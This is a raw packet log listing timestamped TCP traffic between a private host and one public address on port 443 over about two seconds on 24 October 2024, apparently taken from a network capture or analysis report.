Oct 24, 2024 13:40:08.501245022 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.501260996 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501291990 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501315117 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.501324892 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501357079 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501360893 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.501384974 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501410007 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.501451015 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.507524967 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.507549047 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.507635117 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.507643938 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.556420088 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.649949074 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650005102 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650167942 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.650187969 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650235891 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.650293112 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650336981 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650356054 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.650363922 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650392056 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.650413990 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.650923967 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.650963068 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.651001930 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.651010036 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.651036978 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.651058912 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.651669979 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.651716948 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.651762009 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.651770115 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.651802063 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.651832104 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.801727057 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.801762104 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.801857948 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.801912069 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.801996946 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.802007914 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.802124023 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.802515984 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.802546024 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.802583933 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.802594900 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.802617073 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.803260088 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803308964 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803356886 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.803364992 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803395033 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.803845882 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803886890 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803922892 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.803931952 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.803950071 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.853193998 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.955955982 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956027031 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956130028 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.956140041 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956176996 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.956197977 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.956610918 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956657887 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956695080 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.956702948 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.956728935 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.956739902 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.957268953 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.957314014 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.957350969 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.957357883 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.957389116 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.957401991 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958025932 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958076954 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958110094 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958117008 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958142042 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958162069 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958817959 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958858967 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958898067 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958904982 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.958930016 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.958944082 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.106472969 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106525898 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106626034 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.106648922 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106686115 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.106700897 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.106878996 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106921911 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106952906 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.106961966 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.106990099 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107001066 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107220888 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107280970 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107331991 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107342958 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107357025 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107388020 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107821941 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107865095 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107897043 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107904911 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.107932091 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.107952118 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.108464956 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.108505964 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.108544111 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.108551025 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.108577967 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.108597994 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.267720938 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.267782927 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.267960072 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.267975092 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268024921 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268188953 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268230915 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268261909 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268269062 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268297911 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268307924 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268598080 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268642902 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268675089 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268682003 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.268697977 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.268922091 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269190073 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269239902 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269269943 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269277096 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269304991 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269325972 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269778967 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269818068 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269848108 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269855976 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.269885063 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.269905090 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414249897 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414303064 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414335012 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414346933 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414364100 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414391041 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414729118 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414772987 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414793968 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414812088 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.414833069 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.414856911 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415209055 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415252924 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415275097 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415282011 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415307045 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415322065 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415822983 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415863991 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415888071 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415894985 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.415924072 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.415936947 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.416621923 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.416666031 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.416690111 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.416697025 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.416721106 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.416749001 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566006899 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566061020 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566112041 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566127062 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566169024 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566184044 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566268921 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566309929 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566329956 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566339970 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566363096 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566385031 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566498995 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566545010 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566565990 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566572905 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566602945 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566621065 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566879034 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566917896 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566951990 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.566957951 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.566986084 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567007065 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567517042 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567562103 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567599058 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567605972 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567620993 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567646980 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567856073 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567895889 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567919970 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567928076 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.567955017 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.567966938 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.718504906 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.718568087 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.718655109 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.718662977 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.718708992 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719016075 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719058990 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719093084 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719100952 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719115973 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719146967 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719666958 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719726086 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719742060 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719750881 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.719784021 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.719803095 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720298052 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720343113 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720366955 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720374107 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720401049 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720417976 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720863104 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720907927 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720938921 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720946074 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.720971107 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.720982075 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.868895054 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.868920088 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869096994 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869106054 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869158030 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869286060 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869311094 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869354963 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869364023 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869389057 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869405985 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869890928 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869911909 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869956970 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.869965076 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.869988918 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.870014906 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.870601892 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.870625019 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.870686054 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.870693922 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.870738029 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.871226072 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.871248960 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.871293068 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.871300936 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:09.871325970 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:09.871351957 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021261930 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021287918 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021347046 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021357059 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021383047 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021400928 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021729946 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021750927 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021789074 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021795988 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.021820068 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.021840096 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022253990 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022274971 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022315025 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022324085 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022356987 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022375107 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022849083 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022870064 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022907972 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022913933 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.022944927 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.022960901 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.023263931 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.023283005 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.023323059 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.023329973 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.023355007 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.023374081 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.174453974 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.174493074 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.174611092 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.174624920 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.174668074 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175131083 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175158978 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175205946 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175215960 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175230026 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175252914 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175734043 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175759077 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175801039 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175807953 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.175834894 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.175858021 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176269054 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176290989 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176335096 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176342010 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176367998 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176392078 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176748037 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176773071 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176817894 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176827908 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.176843882 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176867008 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176927090 CEST	443	49704	188.132.193.46	192.168.2.5
